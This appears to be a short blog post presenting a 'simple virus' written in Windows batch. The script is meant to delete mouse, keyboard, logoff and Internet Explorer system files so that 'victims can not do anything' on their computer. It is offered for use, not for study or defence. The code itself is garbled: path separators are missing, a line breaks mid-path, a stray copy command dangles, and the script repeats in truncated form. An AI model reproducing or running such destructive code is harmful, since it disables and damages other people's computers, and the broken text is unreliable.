Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.
@echo off
@if exist c:windowssystem32mouse del c:windowssystem32mouse
@if exist c:windowssystem32keyboard del c:windowssystem32keyboard
copy C:windows
@if exist c:windowssystem32logoff.exe del c:windowssystem32logoff.exe
@if exist C
rogram filesinternet exploreriexplore.exe del C
rogram filesinternet exploreriexplore.exe
I hope that you know how to create batch programming. If you don’t know please read previous posts about Batch Programming.
@echo off
@if exist c:windowssystem32mouse del c:windowssystem32mouse
@if exist c:windowssystem32keyboard del c:windowssystem32keyboard
copy C:windows
@if exist c:windowssystem32logoff.exe del c:windowssystem32logoff.exe
@if exist C
I hope that you know how to create batch programming. If you don’t know please read previous posts about Batch Programming.